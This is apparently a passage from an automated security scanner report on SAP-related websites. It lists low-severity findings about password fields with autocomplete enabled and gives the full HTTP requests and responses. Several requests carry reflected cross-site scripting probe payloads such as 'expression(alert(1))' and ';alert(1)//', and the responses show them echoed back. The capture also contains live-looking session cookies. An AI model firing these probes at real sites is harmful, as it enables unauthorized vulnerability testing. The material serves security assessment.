Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; SAP_SCORING_COOKIE=SOLUTION=BARB002004,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:24:25 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:24:25 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:24:25 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:24:25 GMT
Content-Length: 87585


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
<body>
       <form name="mobjForm" method="post" action="index.epx" id="mobjForm">
<div>
...[SNIP]...
<br/>
                           <input name="mobjTemplate$form$FormLogOn$txtPassword" type="password" maxlength="8" id="mobjTemplate_form_FormLogOn_txtPassword" size="25" class="form" onkeypress="searchPressed(this, &#39;__doPostBack(\&#39;mobjTemplate$form$FormLogOn$btnSubmit\&#39;,\&#39;\&#39;)&#39;);" style="width:150px" />
                       </td>
...[SNIP]...
13.11. http://www.sapbusinessoptimizer.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.sapbusinessoptimizer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:04:28 GMT
Server: Apache
Set-Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 12285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Home</title>
<meta
...[SNIP]...
</ul>
   
   <form onsubmit="Login.submit('mini');" action="javascript:void(0);">
       <div class="field">
...[SNIP]...
</label>
           <input type="password" name="Password" id="mini_pass" class="text" value="Password" />
       </div>
...[SNIP]...
13.12. http://www.sapphirenow.com/login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /login.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login.aspx?ReturnUrl=%2fdefault.aspx HTTP/1.1
Host: www.sapphirenow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapandasug.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:25:57 GMT
Content-Length: 42868


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   S
...[SNIP]...
<body>
<form name="form1" method="post" action="login.aspx?ReturnUrl=%2fdefault.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="form1" style="height: 300px;">
<div>
...[SNIP]...
<div class="email-container">
<input name="userLogin1$txtPassword" type="password" id="userLogin1_txtPassword" class="text-field" />
<span id="userLogin1_rfvpassword" style="color:Red;display:none;">
...[SNIP]...
13.13. http://www.sapphirenow.com/login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /login.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login.aspx HTTP/1.1
Host: www.sapphirenow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Sat, 15 Oct 2011 15:04:54 GMT
Expires: -1
Pragma: no-cache
Connection: close
X-Powered-By: ASP.NET
Content-Length: 42818


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   S
...[SNIP]...
<body>
<form name="form1" method="post" action="login.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="form1" style="height: 300px;">
<div>
...[SNIP]...
<div class="email-container">
<input name="userLogin1$txtPassword" type="password" id="userLogin1_txtPassword" class="text-field" />
<span id="userLogin1_rfvpassword" style="color:Red;display:none;">
...[SNIP]...
13.14. http://www.sapphirenow.com/login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /login.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login.aspx?ReturnUrl=%2fdefault.aspxfcf2f%22style%3d%22x%3aexpression(alert(1))%2234bced315ef HTTP/1.1
Host: www.sapphirenow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapphirenow.com/login.aspx?ReturnUrl=%2fdefault.aspxfcf2f%22style%3d%22x%3aexpression(alert(1))%2234bced315ef
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=270210419.1641825112.1318688722.1318688722.1318688722.1; __utmz=270210419.1318688724.1.1.utmcsr=sapandasug.com|utmccn=(referral)|utmcmd=referral|utmcct=/; 37021986-VID=5110247826455

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 15:28:49 GMT
Content-Length: 42972


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   S
...[SNIP]...
<body>
<form name="form1" method="post" action="login.aspx?ReturnUrl=%2fdefault.aspxfcf2f%22style%3d%22x%3aexpression(alert(1))%2234bced315ef" onsubmit="javascript:return WebForm_OnSubmit();" id="form1" style="height: 300px;">
<div>
...[SNIP]...
<div class="email-container">
<input name="userLogin1$txtPassword" type="password" id="userLogin1_txtPassword" class="text-field" />
<span id="userLogin1_rfvpassword" style="color:Red;display:none;">
...[SNIP]...
13.15. http://www.sapphirenow.com/login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /login.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login.aspx?ReturnUrl=%2fdefault.aspx&a00f1%22style%3d%22x%3aexpression(alert(1))%225e28a9da3e5=1 HTTP/1.1
Host: www.sapphirenow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapphirenow.com/login.aspx?ReturnUrl=%2fdefault.aspx&a00f1%22style%3d%22x%3aexpression(alert(1))%225e28a9da3e5=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=jaulcs2tyzxxmgycdn1cnz55; X-Mapping-fjhppofk=36AEB751A4C233CE8FEA8D36CE68B1EF; __utma=270210419.1641825112.1318688722.1318688722.1318692187.2; __utmb=270210419.1.10.1318692188; __utmc=270210419; __utmz=270210419.1318692188.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/18; 37021986-VID=5110247826455; 37021986-SKEY=6638045003516868152; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 15:28:54 GMT
Content-Length: 42982


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   S
...[SNIP]...
<body>
<form name="form1" method="post" action="login.aspx?ReturnUrl=%2fdefault.aspx&amp;a00f1%22style%3d%22x%3aexpression(alert(1))%225e28a9da3e5=1" onsubmit="javascript:return WebForm_OnSubmit();" id="form1" style="height: 300px;">
<div>
...[SNIP]...
<div class="email-container">
<input name="userLogin1$txtPassword" type="password" id="userLogin1_txtPassword" class="text-field" />
<span id="userLogin1_rfvpassword" style="color:Red;display:none;">
...[SNIP]...
13.16. http://www.sapvirtualevents.com/teched/login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /teched/login.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /teched/login.aspx HTTP/1.1
Host: www.sapvirtualevents.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Sat, 15 Oct 2011 15:04:56 GMT
Location: /teched/default.aspx?NavId=1&token=
Expires: -1
Pragma: no-cache
Connection: close
Set-Cookie: IsFirstTimeLogin=1; path=/
Set-Cookie: userID=1; path=/
Set-Cookie: userID=1; path=/
Set-Cookie: securityRoleID=0; path=/
Set-Cookie: .SESSION_COOKIE_TECHED=1|Anonymous|Anonymous||Anonymous@Anonymous.com|0|1|1|0|General Settings||43c1dd10-4d1e-4c5d-8743-4b227d05c824|United States|4b117873-111d-43fb-aa45-4e60c941153b|true; expires=Tue, 15-Nov-2011 16:04:57 GMT; path=/
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Content-Length: 28990

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fteched%2fdefault.aspx%3fNavId%3d1%26token%3d">here</a>.</h2>
</body></html>

<!DOCTYPE html PUBLIC "-//W3C//DTD
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="/teched/login.aspx" style="height: 300px;" id="aspnetForm"><div>
...[SNIP]...
<div class="email-container">
<input name="ctl00$ContentPlaceHolder1$userLogin1$txtPassword" type="password" id="ctl00_ContentPlaceHolder1_userLogin1_txtPassword" class="text-field" />
<span id="ctl00_ContentPlaceHolder1_userLogin1_rfvpassword" style="color:Red;display:none;">
...[SNIP]...
13.17. http://www.sapvirtualevents.com/teched/login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /teched/login.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /teched/login.aspx?eventid=1&languageid=1&ReturnUrl=default.aspx%3feventname%3dteched%26 HTTP/1.1
Host: www.sapvirtualevents.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573; ASP.NET_SessionId=3u4vth452bt54055m1l5rj55

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: /teched/default.aspx
Server: Microsoft-IIS/7.5
X-Powered-By: UrlRewriter.NET 2.0.0
X-AspNet-Version: 2.0.50727
Set-Cookie: IsFirstTimeLogin=1; path=/
Set-Cookie: userID=1; path=/
Set-Cookie: userID=1; path=/
Set-Cookie: securityRoleID=0; path=/
Set-Cookie: .SESSION_COOKIE_TECHED=1|Anonymous|Anonymous||Anonymous@Anonymous.com|0|1|1|0|General Settings||7df06b41-67e5-4e76-b695-2d83bcab420b|United States|4b117873-111d-43fb-aa45-4e60c941153b|true; expires=Tue, 15-Nov-2011 15:30:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:30:12 GMT
Content-Length: 29108

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fteched%2fdefault.aspx">here</a>.</h2>
</body></html>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="/teched/login.aspx?eventid=1&amp;languageid=1&amp;ReturnUrl=default.aspx%3feventname%3dteched%26" style="height: 300px;" id="aspnetForm"><div>
...[SNIP]...
<div class="email-container">
<input name="ctl00$ContentPlaceHolder1$userLogin1$txtPassword" type="password" id="ctl00_ContentPlaceHolder1_userLogin1_txtPassword" class="text-field" />
<span id="ctl00_ContentPlaceHolder1_userLogin1_rfvpassword" style="color:Red;display:none;">
...[SNIP]...
13.18. http://www.sapvirtualevents.com/teched/login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /teched/login.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /teched/login.aspx?eventid=1&languageid=1&ReturnUrl=default.aspx%3feventname%3dteched%26433fe'%3balert(1)//fea0f539288 HTTP/1.1
Host: www.sapvirtualevents.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapvirtualevents.com/teched/login.aspx?eventid=1&languageid=1&ReturnUrl=default.aspx%3feventname%3dteched%26433fe'%3balert(1)//fea0f539288
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .SESSION_COOKIE_TECHED=1|Anonymous|Anonymous||Anonymous@Anonymous.com|0|1|1|0|General Settings||edcbb5be-eddd-4d03-b903-d45503e9170c|United States|4b117873-111d-43fb-aa45-4e60c941153b|true; __utma=217282836.383781452.1318689024.1318689024.1318689024.1; __utmz=217282836.1318689025.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _pk_id.1.cbc3=7b9b230ebda00332.1318689026.1.1318689910.1318689026.; 37021986-VID=5110247826455

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: /teched/default.aspx?433fe';alert(1)//fea0f539288
Server: Microsoft-IIS/7.5
X-Powered-By: UrlRewriter.NET 2.0.0
X-AspNet-Version: 2.0.50727
Set-Cookie: IsFirstTimeLogin=1; path=/
Set-Cookie: userID=1; path=/
Set-Cookie: userID=1; path=/
Set-Cookie: securityRoleID=0; path=/
Set-Cookie: .SESSION_COOKIE_TECHED=1|Anonymous|Anonymous||Anonymous@Anonymous.com|0|1|1|0|General Settings||47db9f3d-09ec-47a7-ba77-c370cf384d16|United States|828f23eb-0f1f-4edc-a944-b0caed675d5c|true; expires=Tue, 15-Nov-2011 16:28:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 15:28:27 GMT
Content-Length: 29203

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fteched%2fdefault.aspx%3f433fe'%3balert(1)%2f%2ffea0f539288">here</a>.</h2>
</body></html>

<!DOCTYPE html PUBLI
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="/teched/login.aspx?eventid=1&amp;languageid=1&amp;ReturnUrl=default.aspx%3feventname%3dteched%26433fe'%3balert(1)//fea0f539288" style="height: 300px;" id="aspnetForm"><div>
...[SNIP]...
<div class="email-container">
<input name="ctl00$ContentPlaceHolder1$userLogin1$txtPassword" type="password" id="ctl00_ContentPlaceHolder1_userLogin1_txtPassword" class="text-field" />
<span id="ctl00_ContentPlaceHolder1_userLogin1_rfvpassword" style="color:Red;display:none;">
...[SNIP]...
13.19. http://www.sdn.sap.com/irj/scn/advancedsearch  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/scn/advancedsearch

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /irj/scn/advancedsearch?query=xss+password+help+faq+contact HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sdn.sap.com/irj/scn/sdnweblogs/popularposts
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw==; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; saplb_*=(J2EE3414700)3414750; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; JSESSIONID=(J2EE3414700)ID1654067250DB01193030658320856037End; SDNSTATE=392433836.14340.0000; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; omniture=s.prop1%3D%27na%27%3Bs.prop2%3D%27en%27%3Bs.prop5%3D%27us%27%3Bs.prop6%3D%27visitor%27%3B; PortalAlias=scn; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fpub%2fq%2ftop_weblogs; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318691787|check#true#1318689987; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Asdnweblogs%253Apopularposts%7C1318691728224%3B%20pe%3Dno%2520value%7C1318691728230%3B%20c3%3Dno%2520value%7C1318691728253%3B%20s_nr%3D1318689928258-New%7C1321281928258%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293528260%3B%20s_visit%3D1%7C1318691728263%3B%20gpv_p47%3Dno%2520value%7C1318691728265%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D6%3B%20s_sq%3Dsapcommunity%252Csapglobal%253D%252526pid%25253Dscn%2525253Aglo%2525253Ascn%2525253Asdnweblogs%2525253Apopularposts%252526pidt%25253D1%252526oid%25253Djavascript%2525253Adocument.searchboxform.submit%25252528%25252529%2525253B%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Content-Length: 28741
Date: Sat, 15 Oct 2011 14:59:31 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<div class="boxtop">
           <form name="loginform" method="post" id="loginform" accept-charset="ISO-8859-1">
    <input type="hidden" name="login_submit" value="on">
...[SNIP]...
<td><input class="textinput" name="j_password" type="password" maxlength="50" onkeypress="checkEnter(event)"></td>
...[SNIP]...
13.20. http://www.sdn.sap.com/irj/scn/downloads  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/scn/downloads

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /irj/scn/downloads HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
SDN_RES_KEY: /webcontent/uuid/087fe75d-0501-0010-11bf-80f5c43d4f0c
Expires: 0
Date: Sat, 15 Oct 2011 15:04:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PortalAlias=scn; Path=/
Content-Length: 61519

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<div class="boxtop">
           <form name="loginform" method="post" id="loginform" accept-charset="ISO-8859-1">
    <input type="hidden" name="login_submit" value="on">
...[SNIP]...
<td><input class="textinput" name="j_password" type="password" maxlength="50" onkeypress="checkEnter(event)"></td>
...[SNIP]...
13.21. http://www.sdn.sap.com/irj/scn/index  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/scn/index

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /irj/scn/index HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
SDN_RES_KEY: /webcontent/uuid/10956870-6186-2b10-86ab-e0bbdc47e11f
Expires: 0
Date: Sat, 15 Oct 2011 15:04:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PortalAlias=scn; Path=/
Content-Length: 58094

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<div class="boxtop">
           <form name="loginform" method="post" id="loginform" accept-charset="ISO-8859-1">
    <input type="hidden" name="login_submit" value="on">
...[SNIP]...
<td><input class="textinput" name="j_password" type="password" maxlength="50" onkeypress="checkEnter(event)"></td>
...[SNIP]...
13.22. http://www.sdn.sap.com/irj/scn/logon  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/scn/logon

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /irj/scn/logon HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Date: Sat, 15 Oct 2011 15:04:50 GMT
Content-Length: 21956
Connection: close
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<div class="boxtop">
           <form name="loginform" method="post" id="loginform" accept-charset="ISO-8859-1">
    <input type="hidden" name="login_submit" value="on">
...[SNIP]...
<td><input class="textinput" name="j_password" type="password" maxlength="50" onkeypress="checkEnter(event)"></td>
...[SNIP]...
13.23. http://www.sdn.sap.com/irj/scn/sdnweblogs/popularposts  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/scn/sdnweblogs/popularposts

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /irj/scn/sdnweblogs/popularposts HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sdn.sap.com/irj/scn/weblogs?blog=/pub/wlg/26917
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
